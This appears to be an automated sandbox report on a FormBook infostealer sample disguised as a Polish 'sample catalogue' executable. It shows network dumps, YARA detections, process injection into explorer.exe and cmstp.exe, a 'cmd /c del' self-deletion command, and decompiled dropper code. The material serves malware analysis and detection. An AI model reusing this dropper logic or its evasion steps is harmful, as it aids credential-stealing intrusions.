65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f
                                                Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robo
                                                Nov 4, 2021 11:50:03.508635998 CET7577INData Raw: 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77
                                                Data Ascii: ts" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace.css" rel="stylesheet
                                                Nov 4, 2021 11:50:03.508655071 CET7578INData Raw: 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 6c 6f 63 61 6c 65 2f 6d 65 73 73 61 67 65 73 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70
                                                Data Ascii: s/error-pages/locale/messages_en.js"></script> ... --><script src="//static.parastorage.com/services/wix-public/1.299.0/scripts/error-pages/app.js"></script> ... --><script> angular.module('wixErrorPagesApp').constant('staticsUrl'


                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: nowy przyk#U0142adowy katalog.exe PID: 6524 Parent PID: 5860

                                                General

                                                Start time:11:47:59
                                                Start date:04/11/2021
                                                Path:C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
                                                Imagebase:0x400000
                                                File size:422298 bytes
                                                MD5 hash:CBE0E49106FAD96B2C1C155CE5B22ABD
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: nowy przyk#U0142adowy katalog.exe PID: 6596 Parent PID: 6524

                                                General

                                                Start time:11:48:01
                                                Start date:04/11/2021
                                                Path:C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
                                                Imagebase:0x400000
                                                File size:422298 bytes
                                                MD5 hash:CBE0E49106FAD96B2C1C155CE5B22ABD
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: explorer.exe PID: 3440 Parent PID: 6596

                                                General

                                                Start time:11:48:05
                                                Start date:04/11/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6f22f0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: cmstp.exe PID: 5596 Parent PID: 3440

                                                General

                                                Start time:11:48:30
                                                Start date:04/11/2021
                                                Path:C:\Windows\SysWOW64\cmstp.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                Imagebase:0xd0000
                                                File size:82944 bytes
                                                MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                Chronological Activities

                                                Analysis Process: cmd.exe PID: 5632 Parent PID: 5596

                                                General

                                                Start time:11:48:35
                                                Start date:04/11/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
                                                Imagebase:0x2a0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: conhost.exe PID: 5548 Parent PID: 5632

                                                General

                                                Start time:11:48:36
                                                Start date:04/11/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff61de10000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Disassembly

                                                Code Analysis

                                                Reset < >

                                                  Analysis Process: nowy przyk#U0142adowy katalog.exe PID: 6524 Parent PID: 5860 nowy przyk#U0142adowy katalog.exeCOMMON

                                                  Executed Functions

                                                  Function 0040312A, Relevance: 82.6, APIs: 26, Strings: 21, Instructions: 315stringfilecomCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F57(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405BC7("C:\\Users\\engineer\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116);
								_t60 = E004030F9(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403540();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x42ecb4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x42eccc; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F57(5);
											_t119 = E00405F57(6);
											_t67 = E00405F57(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F57(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x42ec3c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x42eccc =  *0x42eccc | 0xffffffff;
										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
										goto L37;
									}
									_t123 = E004056E5(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E0040540F(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\engineer\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\engineer\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053F2();
											} else {
												E00405375();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405BC7("C:\\Users\\engineer\\AppData\\Local\\Temp", _t127);
											}
											E00405BC7(0x42f000,  *(_t129 + 0x20));
											 *0x42f400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x42ec30; // 0x79ee58
												E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x428c58);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\engineer\\Desktop\\nowy przyk#U0142adowy katalog.exe", 0x428c58, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x428c58);
														E00405915(_t149);
														_t93 =  *0x42ec30; // 0x79ee58
														E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E00405427(0x428c58);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x42f400 =  *0x42f400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E00405915(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040579B(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405BC7("C:\\Users\\engineer\\AppData\\Local\\Temp", _t124);
									E00405BC7("C:\\Users\\engineer\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030F9(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EE9(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F57(0xd);
					_t47 = E00405F57(0xb);
					 *0x42ec24 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x42ecd8 = _t47;
					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405BC7("egkwshqw Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\engineer\\Desktop\\nowy przyk#U0142adowy katalog.exe\" ";
					E00405BC7(_t125, _t51);
					 *0x42ec20 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\engineer\\Desktop\\nowy przyk#U0142adowy katalog.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M00434001;
					}
					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}


































                                                  0x0040313b
                                                  0x0040313f
                                                  0x00403147
                                                  0x0040314b
                                                  0x00403150
                                                  0x00403160
                                                  0x00403163
                                                  0x0040316a
                                                  0x00403171
                                                  0x00403171
                                                  0x0040316a
                                                  0x00403173
                                                  0x00403173
                                                  0x00403289
                                                  0x00403289
                                                  0x00403289
                                                  0x0040328b
                                                  0x0040328d
                                                  0x00000000
                                                  0x00000000
                                                  0x00403222
                                                  0x00403225
                                                  0x0040322d
                                                  0x0040322d
                                                  0x00403230
                                                  0x00403235
                                                  0x00403237
                                                  0x00403237
                                                  0x00403238
                                                  0x00403238
                                                  0x0040323d
                                                  0x00403240
                                                  0x00403279
                                                  0x0040327e
                                                  0x00403283
                                                  0x00403286
                                                  0x00403288
                                                  0x00403288
                                                  0x00403288
                                                  0x00000000
                                                  0x00403242
                                                  0x00403242
                                                  0x00403243
                                                  0x00403246
                                                  0x0040324e
                                                  0x00403251
                                                  0x00403253
                                                  0x00403253
                                                  0x00403253
                                                  0x00403253
                                                  0x00403251
                                                  0x00403258
                                                  0x0040325e
                                                  0x00403266
                                                  0x00403269
                                                  0x0040326b
                                                  0x0040326b
                                                  0x0040326b
                                                  0x0040326b
                                                  0x00403269
                                                  0x00403270
                                                  0x00403277
                                                  0x00403291
                                                  0x00403294
                                                  0x00403294
                                                  0x0040329d
                                                  0x004032a2
                                                  0x004032a2
                                                  0x004032ad
                                                  0x004032b3
                                                  0x004032b8
                                                  0x004032ba
                                                  0x004032e0
                                                  0x004032e5
                                                  0x004032ef
                                                  0x004032f6
                                                  0x004032fa
                                                  0x00403361
                                                  0x00403361
                                                  0x00403366
                                                  0x0040336c
                                                  0x00403370
                                                  0x00403485
                                                  0x0040348b
                                                  0x00403528
                                                  0x00403528
                                                  0x0040352d
                                                  0x00403530
                                                  0x00403532
                                                  0x00403532
                                                  0x0040353a
                                                  0x0040353a
                                                  0x0040349a
                                                  0x004034a3
                                                  0x004034a5
                                                  0x004034aa
                                                  0x004034ac
                                                  0x004034ae
                                                  0x004034b0
                                                  0x004034b2
                                                  0x004034b4
                                                  0x004034b6
                                                  0x004034c6
                                                  0x004034c8
                                                  0x004034ca
                                                  0x004034d7
                                                  0x004034e6
                                                  0x004034ee
                                                  0x004034f6
                                                  0x004034f6
                                                  0x004034ca
                                                  0x004034b6
                                                  0x004034b2
                                                  0x004034fa
                                                  0x004034ff
                                                  0x00403506
                                                  0x00403514
                                                  0x00403517
                                                  0x0040351d
                                                  0x0040351f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403508
                                                  0x0040350e
                                                  0x00403510
                                                  0x00403512
                                                  0x00403521
                                                  0x00403523
                                                  0x00000000
                                                  0x00403523
                                                  0x00000000
                                                  0x00403512
                                                  0x00403506
                                                  0x0040337f
                                                  0x00403386
                                                  0x00403386
                                                  0x004032fc
                                                  0x00403302
                                                  0x00403351
                                                  0x00403351
                                                  0x0040335d
                                                  0x00000000
                                                  0x0040335d
                                                  0x0040330b
                                                  0x00403318
                                                  0x0040330f
                                                  0x00403315
                                                  0x00000000
                                                  0x00000000
                                                  0x00403317
                                                  0x00403317
                                                  0x00403317
                                                  0x0040331c
                                                  0x0040331e
                                                  0x00403326
                                                  0x00403397
                                                  0x00403399
                                                  0x004033a0
                                                  0x004033a8
                                                  0x004033a8
                                                  0x004033b3
                                                  0x004033b8
                                                  0x004033c7
                                                  0x004033cb
                                                  0x004033cc
                                                  0x004033d5
                                                  0x004033ce
                                                  0x004033ce
                                                  0x004033ce
                                                  0x004033db
                                                  0x004033e1
                                                  0x004033e7
                                                  0x004033ef
                                                  0x004033ef
                                                  0x004033fd
                                                  0x00403404
                                                  0x0040340d
                                                  0x00403413
                                                  0x00403413
                                                  0x0040341f
                                                  0x00403425
                                                  0x0040342f
                                                  0x00403439
                                                  0x0040343f
                                                  0x00403441
                                                  0x00403443
                                                  0x00403444
                                                  0x00403445
                                                  0x0040344a
                                                  0x00403456
                                                  0x0040345c
                                                  0x00403463
                                                  0x00403466
                                                  0x0040346c
                                                  0x0040346c
                                                  0x00403463
                                                  0x00403441
                                                  0x00403470
                                                  0x00403476
                                                  0x00403476
                                                  0x00403476
                                                  0x00403479
                                                  0x0040347a
                                                  0x0040347b
                                                  0x0040347b
                                                  0x00000000
                                                  0x004033c7
                                                  0x00403328
                                                  0x0040332a
                                                  0x00403335
                                                  0x00000000
                                                  0x00000000
                                                  0x0040333d
                                                  0x00403348
                                                  0x0040334d
                                                  0x00000000
                                                  0x0040334d
                                                  0x004032c2
                                                  0x004032ce
                                                  0x004032d3
                                                  0x004032d8
                                                  0x004032da
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403277
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403227
                                                  0x00403227
                                                  0x00403227
                                                  0x00403228
                                                  0x00403228
                                                  0x00000000
                                                  0x00403227
                                                  0x00000000
                                                  0x00403178
                                                  0x00403179
                                                  0x00403185
                                                  0x0040318b
                                                  0x00000000
                                                  0x0040318d
                                                  0x0040318f
                                                  0x00403196
                                                  0x0040319b
                                                  0x004031a0
                                                  0x004031a7
                                                  0x004031ad
                                                  0x004031c3
                                                  0x004031d3
                                                  0x004031d8
                                                  0x004031de
                                                  0x004031e5
                                                  0x004031f8
                                                  0x004031fd
                                                  0x004031ff
                                                  0x00403201
                                                  0x00403206
                                                  0x00403206
                                                  0x00403216
                                                  0x0040321c
                                                  0x00000000
                                                  0x0040321c

                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 00403150
                                                  • GetVersion.KERNEL32 ref: 00403156
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
                                                  • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
                                                  • OleInitialize.OLE32(00000000), ref: 004031A7
                                                  • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
                                                  • GetCommandLineA.KERNEL32(egkwshqw Setup,NSIS Error), ref: 004031D8
                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,00000000), ref: 004031EB
                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,00409168), ref: 00403216
                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
                                                  • DeleteFileA.KERNELBASE(1033), ref: 004032E5
                                                    • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                    • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                  • OleUninitialize.OLE32(00000020), ref: 00403366
                                                  • ExitProcess.KERNEL32 ref: 00403386
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,00000000,00000020), ref: 00403399
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,00000000,00000020), ref: 004033A8
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,00000000,00000020), ref: 004033B3
                                                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,00000000,00000020), ref: 004033BF
                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                  • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
                                                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,00428C58,00000001), ref: 00403439
